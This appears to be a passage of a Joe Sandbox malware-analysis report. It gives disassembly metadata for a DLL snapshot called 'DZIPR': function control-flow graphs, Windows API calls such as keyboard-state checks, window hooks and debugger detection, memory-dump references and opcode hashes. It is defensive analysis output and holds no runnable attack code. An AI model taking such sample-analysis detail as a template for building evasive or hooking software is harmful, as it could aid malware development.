                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 41efa1666756047cae4f85fa81840d965845a7e62580bc1e0985e7dd3c1cde20
                                          • Instruction ID: 13ca562090f65253a11a26ca8e3272582f61a284697e0244ac8429360f5ab986
                                          • Opcode Fuzzy Hash: 41efa1666756047cae4f85fa81840d965845a7e62580bc1e0985e7dd3c1cde20
                                          • Instruction Fuzzy Hash: 9731DF35A087458FC718CF19C89066AF7E2BFCA314F19C96DE88557316D634F896CB81
                                          Function 6FA4C050 Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 254 6fa4c050-6fa4c068 call 6fa550c9 257 6fa4c06f-6fa4c072 254->257 258 6fa4c06a call 6fa46dc1 254->258 260 6fa4c074-6fa4c07c 257->260 261 6fa4c0aa-6fa4c0bb call 6fa4ba5b 257->261 258->257 263 6fa4c07e-6fa4c09d call 6fa4bd66 260->263 264 6fa4c09f call 6fa4bc4e 260->264 268 6fa4c0d0-6fa4c0d7 call 6fa551a1 261->268 269 6fa4c0bd-6fa4c0cb call 6fa4be0d 261->269 263->258 263->264 271 6fa4c0a4-6fa4c0a8 264->271 269->268 271->258 271->261
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FA4C057
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: H_prolog3$Exception@8Throw
                                          • String ID:
                                          • API String ID: 2489616738-0
                                          • Opcode ID: 3320b2b07744822e9c8c2159f7b9bcf6e99932412156665e67cd5c989bbab1d6
                                          • Instruction ID: 8b78ec9fd180a1b24cea539d83a26f205ae1429277da3fa0ea38c0afbf8401d6
                                          • Opcode Fuzzy Hash: 3320b2b07744822e9c8c2159f7b9bcf6e99932412156665e67cd5c989bbab1d6
                                          • Instruction Fuzzy Hash: 4701BC35200712CBDB18AF34C91176D76A2AF913A4F15853CD4958B3E0DF39D9D68B90
                                          Function 6FA460F0 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 276 6fa460f0-6fa46139 CreateFileW 277 6fa461de-6fa46780 276->277 278 6fa4613f-6fa467e4 276->278 285 6fa45e23-6fa45e3c 278->285 286 6fa45eba-6fa45f0c GlobalAlloc 278->286 287 6fa45e40-6fa45e4e 285->287 288 6fa45f12-6fa45f2b 286->288 289 6fa45fad 286->289 293 6fa45e50 287->293 294 6fa45ea3 287->294 292 6fa45f2f-6fa45f3d 288->292 291 6fa45faf-6fa45fce 289->291 305 6fa45fe7-6fa45fea 291->305 306 6fa45fd0 291->306 298 6fa45f92 292->298 299 6fa45f3f 292->299 295 6fa45e52-6fa45e58 293->295 296 6fa45ea5-6fa45ea9 294->296 295->295 301 6fa45e5a-6fa45e5c 295->301 303 6fa467c3-6fa467dc 296->303 304 6fa45eaf-6fa45eb4 296->304 302 6fa45f94-6fa45f98 298->302 300 6fa45f41-6fa45f47 299->300 300->300 307 6fa45f49-6fa45f4b 300->307 301->294 308 6fa45e5e-6fa45e64 301->308 309 6fa467a5-6fa467be 302->309 310 6fa45f9e-6fa45fa3 302->310 304->287 312 6fa45eb6 304->312 314 6fa45fec 305->314 315 6fa45ffe-6fa46038 305->315 313 6fa45fd2-6fa45fe5 306->313 307->298 318 6fa45f4d-6fa45f53 307->318 319 6fa466aa-6fa466af 308->319 320 6fa45e6a-6fa45e6e 308->320 309->291 310->292 321 6fa45fa5-6fa45fa9 310->321 312->286 313->305 313->313 322 6fa45fee-6fa45ffc 314->322 316 6fa4603e-6fa46057 315->316 317 6fa460d9 315->317 323 6fa4605b-6fa46069 316->323 328 6fa460db-6fa460ef 317->328 325 6fa466b4 318->325 326 6fa45f59-6fa45f5d 318->326 324 6fa45e90-6fa45e95 319->324 327 6fa45e70-6fa45e86 320->327 321->289 322->315 322->322 329 6fa460be 323->329 330 6fa4606b 323->330 324->296 333 6fa45e97-6fa45ea1 324->333 335 6fa466be 325->335 331 6fa45f5f-6fa45f75 326->331 327->327 332 6fa45e88-6fa45e8c 327->332 337 6fa460c0-6fa460c4 329->337 334 6fa4606d-6fa46073 330->334 331->331 336 6fa45f77-6fa45f84 331->336 332->324 333->296 334->334 338 6fa46075-6fa46077 334->338 340 6fa46788-6fa467a0 335->340 336->302 339 6fa45f86-6fa45f90 336->339 337->340 341 6fa460ca-6fa460cf 337->341 338->329 342 6fa46079-6fa4607f 338->342 339->302 340->328 341->323 343 6fa460d1-6fa460d5 341->343 342->335 344 6fa46085-6fa46089 342->344 343->317 345 6fa4608b-6fa460a1 344->345 345->345 346 6fa460a3-6fa460b0 345->346 346->337 347 6fa460b2-6fa460bc 346->347 347->337
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FA460F6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 214161c2327c1a7079b2dec032040ccb213644b88f76ecebc418cdd9eab7e3a9
                                          • Instruction ID: d00d582371744cfb01009ddf60e02599622ac879970694a082cdd25927ebf0dc
                                          • Opcode Fuzzy Hash: 214161c2327c1a7079b2dec032040ccb213644b88f76ecebc418cdd9eab7e3a9
                                          • Instruction Fuzzy Hash: F701E8B49087119FC718CF0AC89091AFBE6FFC9314F16856DA84897316D630E855CF85
                                          Function 6FA5A6F4 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 348 6fa5a6f4-6fa5a716 HeapCreate 349 6fa5a718-6fa5a719 348->349 350 6fa5a71a-6fa5a723 348->350
                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FA54776,00000001,?,?,?,6FA548EF,?,?,?,6FA6E848,0000000C,6FA549AA), ref: 6FA5A709
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateHeap
                                          • String ID:
                                          • API String ID: 10892065-0
                                          • Opcode ID: e1802dd941dbf5e8fe74c579636b1cc76f2af4d9f345ee4bde7c8036fc67f70c
                                          • Instruction ID: 8b0281f73262b77c9063086c8f7ee5eb4c0e8aa49060ee1bd89c7f77f4d501e5
                                          • Opcode Fuzzy Hash: e1802dd941dbf5e8fe74c579636b1cc76f2af4d9f345ee4bde7c8036fc67f70c
                                          • Instruction Fuzzy Hash: CBD05E36698B549EDB109E766C08B263BED9B857A6F148835F80CC6180F674D5A18A04

                                          Non-executed Functions

                                          Function 6FA4748E Relevance: 12.1, APIs: 8, Instructions: 126filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FA47498
                                          • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FA476D5,?,00000000,?,00000000,00000104,00000000,?,6FA6BEF4,00000000), ref: 6FA474D6
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FA47546
                                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FA4756D
                                          • CharUpperW.USER32(00000000), ref: 6FA475A0
                                          • FindFirstFileW.KERNEL32(?,?), ref: 6FA475BC
                                          • FindClose.KERNEL32(00000000), ref: 6FA475C8
                                          • lstrlenW.KERNEL32(?), ref: 6FA475E6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                          • String ID:
                                          • API String ID: 624941980-0
                                          • Opcode ID: 1f5bcd9e20b17e59966aec657a61533d31b7f3167ce270f2ea363385d3d219cc
                                          • Instruction ID: 9d539197efe3b7293d736a608c1706d57325ffbdfacb47a893948a629566a197
                                          • Opcode Fuzzy Hash: 1f5bcd9e20b17e59966aec657a61533d31b7f3167ce270f2ea363385d3d219cc
                                          • Instruction Fuzzy Hash: B041C0709083559BDF15AF74CD88BBEBB7DAF02318F0442D8E829A5190DB399AD5CF21
                                          Function 6FA53F34 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 6FA57C6C
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FA57C81
                                          • UnhandledExceptionFilter.KERNEL32(6FA6A4B8), ref: 6FA57C8C
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6FA57CA8
                                          • TerminateProcess.KERNEL32(00000000), ref: 6FA57CAF
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: a16689c1e86c82e64bc411981a73786f995536e882668bc04b237678c2345908
                                          • Instruction ID: b91924a47f7888e767328f646e7978f1bd0d3d36e5d16729d292ba0e624f86c3
                                          • Opcode Fuzzy Hash: a16689c1e86c82e64bc411981a73786f995536e882668bc04b237678c2345908
                                          • Instruction Fuzzy Hash: 7721F4B9816B24DFEB40DF68D945E593BF8BB0A325F50C019E8089B390E77494A38F81
                                          Function 6FA489B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FA489FC
                                          • __snwprintf_s.LIBCMT ref: 6FA48A2E
                                          • LoadLibraryW.KERNEL32(?), ref: 6FA48A69
                                            • Part of subcall function 6FA55348: __getptd_noexit.LIBCMT ref: 6FA55348
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                                          • String ID: LOC
                                          • API String ID: 3175857669-519433814
                                          • Opcode ID: fac08e1e381f87f99a97caaa3e4bbd7589c3e2efeb757c8f5a07e96dce7ed4e8
                                          • Instruction ID: ce9a46dd9a8361394ff9fc8a9ace91b655decbf6fc6e9381964843bce66bd9eb
                                          • Opcode Fuzzy Hash: fac08e1e381f87f99a97caaa3e4bbd7589c3e2efeb757c8f5a07e96dce7ed4e8
                                          • Instruction Fuzzy Hash: 2E110671A64308AFDB10AB78DD58BAE77ACAF0236CF050075A114A70C0DBBC9AD4C7B1
                                          Function 6FA504EE Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FA52C57: GetWindowLongW.USER32(?,000000F0), ref: 6FA52C62
                                          • GetKeyState.USER32(00000010), ref: 6FA50514
                                          • GetKeyState.USER32(00000011), ref: 6FA5051D
                                          • GetKeyState.USER32(00000012), ref: 6FA50526
                                          • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6FA5053C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: State$LongMessageSendWindow
                                          • String ID:
                                          • API String ID: 1063413437-0
                                          • Opcode ID: b703ceb98914a1bcda390b17911af9de18d697629086ee9869a931aad5c10feb
                                          • Instruction ID: bfb4edd0a8620786adfe36bfe58103321c5d891fa8ac32786dfbde0e27f02629
                                          • Opcode Fuzzy Hash: b703ceb98914a1bcda390b17911af9de18d697629086ee9869a931aad5c10feb
                                          • Instruction Fuzzy Hash: D5F0E975BC078FA5EA1026744F41FF9052C4F81BDCF04D0326645EA0C0CEB8C4A24570
                                          Function 6FA4DE29 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c21d8fd1813e8ff8d5169c09b7967652a352a7ca489d5cedbecf32042046658
                                          • Instruction ID: 0d46d17c1fad4698a0bc48e67c8cc921eba6e2e55e8130153b9cd2901d34354f
                                          • Opcode Fuzzy Hash: 9c21d8fd1813e8ff8d5169c09b7967652a352a7ca489d5cedbecf32042046658
                                          • Instruction Fuzzy Hash: E6F04F31604249EBDF019FB5CD0AAAE3FAEBF12754F44C021F829D5050DB39DA92DB50
                                          Function 6FA45D78 Relevance: .1, Instructions: 83COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80750ab207421b535c7073e0f5fc6907ba3a83069adf37e5bfbae80bc9e21130
                                          • Instruction ID: daf1fa15852b9fbe59f49433e8c9d77f04ab4eac504f94900d90a0d3ccb7cab9
                                          • Opcode Fuzzy Hash: 80750ab207421b535c7073e0f5fc6907ba3a83069adf37e5bfbae80bc9e21130
                                          • Instruction Fuzzy Hash: 6E318676A087058FC724CF59C58062AB7E2FFC9714F5A882DD88857301DB74F895CB81
                                          Function 6FA48BDF Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 159libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FA48BE9
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FA48EB7,?,?), ref: 6FA48C19
                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FA48C2D
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA48C69
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA48C77
                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FA48C94
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA48CBF
                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FA48CC8
                                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FA48CE1
                                          • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FA48CFE
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA48D31
                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 6FA48D3A
                                          • GetModuleFileNameW.KERNEL32(6FA40000,?,00000105), ref: 6FA48D7F
                                          • _memset.LIBCMT ref: 6FA48D9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                          • API String ID: 3537336938-2299501126
                                          • Opcode ID: 305e185b5132203d3e398f677a10138e7cc6ee2acff4b2c72e0c9a2b4c52c301
                                          • Instruction ID: 6b4cbc4e7b44d839d31e5bc28f20f629b646901f410e975a9dfb169ef21a872c
                                          • Opcode Fuzzy Hash: 305e185b5132203d3e398f677a10138e7cc6ee2acff4b2c72e0c9a2b4c52c301
                                          • Instruction Fuzzy Hash: 6B513D71D052289ECB60EFA5AD887ADB7B8FF59714F1001D6A448E3280D7789EC1CF94
                                          Function 6FA4DCCE Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 82libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6FA4DE36,?,?,?,?,?,?,?,6FA4FCC6,00000000,00000002,00000028), ref: 6FA4DCF9
                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FA4DD15
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FA4DD2A
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FA4DD3B
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FA4DD4C
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FA4DD5D
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FA4DD6E
                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FA4DD8E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                          • API String ID: 667068680-2451437823
                                          • Opcode ID: c15971294d938876fd93cb80273eceaaa407734f579b4f8ab1d889e99b54b78f
                                          • Instruction ID: fe7f06679e2214e4a078d9fe816d5898b08c8764b703195cb0a736ecf84e5d94
                                          • Opcode Fuzzy Hash: c15971294d938876fd93cb80273eceaaa407734f579b4f8ab1d889e99b54b78f
                                          • Instruction Fuzzy Hash: 2B213D75915BF1DF8B00AF748AC8C6A7AE9B78FA21314C53FD811D6208C7B850D2CB20
                                          Function 6FA519AE Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 153COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FA519B8
                                            • Part of subcall function 6FA4C050: __EH_prolog3.LIBCMT ref: 6FA4C057
                                          • CallNextHookEx.USER32(?,?,?,?), ref: 6FA519F8
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          • _memset.LIBCMT ref: 6FA51A51
                                          • GetClassLongW.USER32(?,000000E0), ref: 6FA51A85
                                          • SetWindowLongW.USER32(?,000000FC,Function_00010D95), ref: 6FA51ADA
                                          • GetClassNameW.USER32(?,?,00000100), ref: 6FA51B20
                                          • GetWindowLongW.USER32(?,000000FC), ref: 6FA51B46
                                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA51B5D
                                          • SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6FA51B6F
                                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA51B77
                                          • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6FA51B86
                                          • SetWindowLongW.USER32(?,000000FC,Function_00011861), ref: 6FA51B94
                                          • CallNextHookEx.USER32(?,00000003,?,?), ref: 6FA51BA6
                                          • UnhookWindowsHookEx.USER32(?), ref: 6FA51BBA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Long$HookPropWindow$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_NameThrowUnhookWindows_memset
                                          • String ID: #32768$AfxOldWndProc423
                                          • API String ID: 4265692241-2141921550
                                          • Opcode ID: 50ef3992f4713540d54f0e46c53b775b27c55a786be75b6f050337ca5ddc981f
                                          • Instruction ID: a118d575ade916c6ca02d6fac6ae2973f284491feb7b35bda0a97b01470f9b5b
                                          • Opcode Fuzzy Hash: 50ef3992f4713540d54f0e46c53b775b27c55a786be75b6f050337ca5ddc981f
                                          • Instruction Fuzzy Hash: 6D51F5B1540729ABCF11AF64CD48FBA7BB8BF05365F054195F419A61C0EB389AE1CBA0
                                          Function 6FA4FBD6 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON
